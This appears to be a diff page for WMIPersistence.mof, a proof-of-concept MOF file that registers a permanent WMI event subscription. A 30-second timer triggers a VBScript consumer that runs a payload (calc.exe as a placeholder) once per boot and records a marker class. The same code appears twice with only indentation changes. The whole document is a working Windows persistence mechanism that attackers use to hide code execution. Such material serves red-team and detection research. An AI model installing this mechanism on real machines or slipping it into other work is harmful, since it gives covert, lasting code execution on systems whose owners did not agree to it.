KyleHanslovan · June 8, 2016 08:22
diff --git a/WMIPersistence.mof b/WMIPersistence.mof
 /*
 Author: Kyle Hanslovan
 Contact: @KyleHanslovan
 License: MIT
 Date: 07/18/2014
 */

 #PRAGMA NAMESPACE ("\\\\.\\root\\subscription")

 instance of ActiveScriptEventConsumer as $Consumer
 {
    ScriptingEngine = "VBScript";
    ScriptText = ""
    "Const strComputer = \".\"\n"
    "Const strMarkerClassName = \"CIM_Marker\"\n"
    "Const strPayloadPath = \"C:\\\\Windows\\\\system32\\\\calc.exe\"\n"
    "Const strWin32OSClassName = \"Win32_OperatingSystem\"\n"
    "Set objWMI = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\Root\\CIMV2\")\n"
    "Main()\n"
    "Sub SetMarker()\n"
    "    Set objMarker = objWMI.Get()\n"
    "    objMarker.Path_.Class = strMarkerClassName\n"
    "    Const wbemCimTypeDatetime = 101\n"
    "    Call objMarker.Properties_.Add(\"LastRunTime\", wbemCimtypeDatetime)\n"
    "    objMarker.LastRunTime = GetCurrentTime()\n"
    "    objMarker.Put_()\n"
    "End Sub\n"
    "Function ExecutePayload()\n"
    "    ExecutePayload = False\n"
    "    Set objFSO = CreateObject(\"Scripting.FileSystemObject\")\n"
    "    If objFSO.FileExists(strPayloadPath) Then\n"
    "        Set objShell = CreateObject(\"WScript.Shell\")\n"
    "        objShell.Run(strPayloadPath)\n"
    "        ExecutePayload = True\n"
    "    End If\n"
    "End Function\n"
    "Function GetBootTime()\n"
    "    Set GetBootTime = Nothing\n"
    "    Set colOS = objWMI.InstancesOf(strWin32OSClassName)\n"
    "    For Each objOS in colOS\n"
    "        GetBootTime = objOS.LastBootUpTime\n"
    "        Exit For\n"
    "    Next\n"
    "End Function\n"
    "Function GetCurrentTime()\n"
    "    Set GetCurrentTime = Nothing\n"
    "    Set colOS = objWMI.InstancesOf(strWin32OSClassName)\n"
    "    For Each objOS in colOS\n"
    "        GetCurrentTime = objOS.LocalDateTime\n"
    "        Exit For\n"
    "    Next\n"
    "End Function\n"
    "Function GetMarkerTime()\n"
    "    Set GetMarkerTime = Nothing\n"
    "    Set colClasses = objWMI.SubclassesOf()\n"
    "    For Each objClass in colClasses\n"
    "        if InStr(objClass.Path_.Path, strMarkerClassName) Then\n"
    "            GetMarkerTime = objClass.LastRunTime\n"
    "            Exit For\n"
    "        End if\n"
    "    Next\n"
    "End Function\n"
    "Function MarkerExists()\n"
    "    MarkerExists = False\n"
    "    Set colClasses = objWMI.SubclassesOf()\n"
    "    For Each objClass in colClasses\n"
    "        if InStr(objClass.Path_.Path, \":\" & strMarkerClassName) Then\n"
    "            MarkerExists = True\n"
    "            Exit For\n"
    "        End if\n"
    "    Next\n"
    "End Function\n"
    "Function RunSinceBoot()\n"
    "    RunSinceBoot = True\n"
    "    If GetBootTime() > GetMarkerTime() Then\n"
    "        RunSinceBoot = False\n"
    "    End If\n"
    "End Function\n"
    "Sub Main()\n"
    "    If MarkerExists() Then\n"
    "        If Not RunSinceBoot() Then\n"
    "            bSuccess = ExecutePayload()\n"
    "            If bSuccess Then\n"
    "                Call SetMarker()\n"
    "            End If\n"
    "        End If\n"
    "    Else\n"
    "        bSuccess = ExecutePayload()\n"
    "        If bSuccess Then\n"
    "            Call SetMarker()\n"
    "        End If\n"
    "    End If\n"
    "End Sub\n";
 };

 instance of __IntervalTimerInstruction
 {
    TimerId = "EventTimer";
    SkipIfPassed = FALSE;
    IntervalBetweenEvents = 30000;
 };

 instance of __EventFilter as $Filter
 {
    Query = "SELECT * FROM __TimerEvent WHERE TimerId = \"EventTimer\"";
    QueryLanguage = "WQL";
    EventNamespace = "root\\subscription";
 };

 instance of __FilterToConsumerBinding as $Binding
 {
    Filter = $Filter;
    Consumer = $Consumer;
 };
	/*
	Author: Kyle Hanslovan
	Contact: @KyleHanslovan
	License: MIT
	Date: 07/18/2014
	*/

	#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")

	instance of ActiveScriptEventConsumer as $Consumer
	{
	ScriptingEngine = "VBScript";
	ScriptText = ""
	"Const strComputer = \".\"\n"
	"Const strMarkerClassName = \"CIM_Marker\"\n"
	"Const strPayloadPath = \"C:\\\\Windows\\\\system32\\\\calc.exe\"\n"
	"Const strWin32OSClassName = \"Win32_OperatingSystem\"\n"
	"Set objWMI = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\Root\\CIMV2\")\n"
	"Main()\n"
	"Sub SetMarker()\n"
	" Set objMarker = objWMI.Get()\n"
	" objMarker.Path_.Class = strMarkerClassName\n"
	" Const wbemCimTypeDatetime = 101\n"
	" Call objMarker.Properties_.Add(\"LastRunTime\", wbemCimtypeDatetime)\n"
	" objMarker.LastRunTime = GetCurrentTime()\n"
	" objMarker.Put_()\n"
	"End Sub\n"
	"Function ExecutePayload()\n"
	" ExecutePayload = False\n"
	" Set objFSO = CreateObject(\"Scripting.FileSystemObject\")\n"
	" If objFSO.FileExists(strPayloadPath) Then\n"
	" Set objShell = CreateObject(\"WScript.Shell\")\n"
	" objShell.Run(strPayloadPath)\n"
	" ExecutePayload = True\n"
	" End If\n"
	"End Function\n"
	"Function GetBootTime()\n"
	" Set GetBootTime = Nothing\n"
	" Set colOS = objWMI.InstancesOf(strWin32OSClassName)\n"
	" For Each objOS in colOS\n"
	" GetBootTime = objOS.LastBootUpTime\n"
	" Exit For\n"
	" Next\n"
	"End Function\n"
	"Function GetCurrentTime()\n"
	" Set GetCurrentTime = Nothing\n"
	" Set colOS = objWMI.InstancesOf(strWin32OSClassName)\n"
	" For Each objOS in colOS\n"
	" GetCurrentTime = objOS.LocalDateTime\n"
	" Exit For\n"
	" Next\n"
	"End Function\n"
	"Function GetMarkerTime()\n"
	" Set GetMarkerTime = Nothing\n"
	" Set colClasses = objWMI.SubclassesOf()\n"
	" For Each objClass in colClasses\n"
	" if InStr(objClass.Path_.Path, strMarkerClassName) Then\n"
	" GetMarkerTime = objClass.LastRunTime\n"
	" Exit For\n"
	" End if\n"
	" Next\n"
	"End Function\n"
	"Function MarkerExists()\n"
	" MarkerExists = False\n"
	" Set colClasses = objWMI.SubclassesOf()\n"
	" For Each objClass in colClasses\n"
	" if InStr(objClass.Path_.Path, \":\" & strMarkerClassName) Then\n"
	" MarkerExists = True\n"
	" Exit For\n"
	" End if\n"
	" Next\n"
	"End Function\n"
	"Function RunSinceBoot()\n"
	" RunSinceBoot = True\n"
	" If GetBootTime() > GetMarkerTime() Then\n"
	" RunSinceBoot = False\n"
	" End If\n"
	"End Function\n"
	"Sub Main()\n"
	" If MarkerExists() Then\n"
	" If Not RunSinceBoot() Then\n"
	" bSuccess = ExecutePayload()\n"
	" If bSuccess Then\n"
	" Call SetMarker()\n"
	" End If\n"
	" End If\n"
	" Else\n"
	" bSuccess = ExecutePayload()\n"
	" If bSuccess Then\n"
	" Call SetMarker()\n"
	" End If\n"
	" End If\n"
	"End Sub\n";
	};

	instance of __IntervalTimerInstruction
	{
	TimerId = "EventTimer";
	SkipIfPassed = FALSE;
	IntervalBetweenEvents = 30000;
	};

	instance of __EventFilter as $Filter
	{
	Query = "SELECT * FROM __TimerEvent WHERE TimerId = \"EventTimer\"";
	QueryLanguage = "WQL";
	EventNamespace = "root\\subscription";
	};

	instance of __FilterToConsumerBinding as $Binding
	{
	Filter = $Filter;
	Consumer = $Consumer;
	};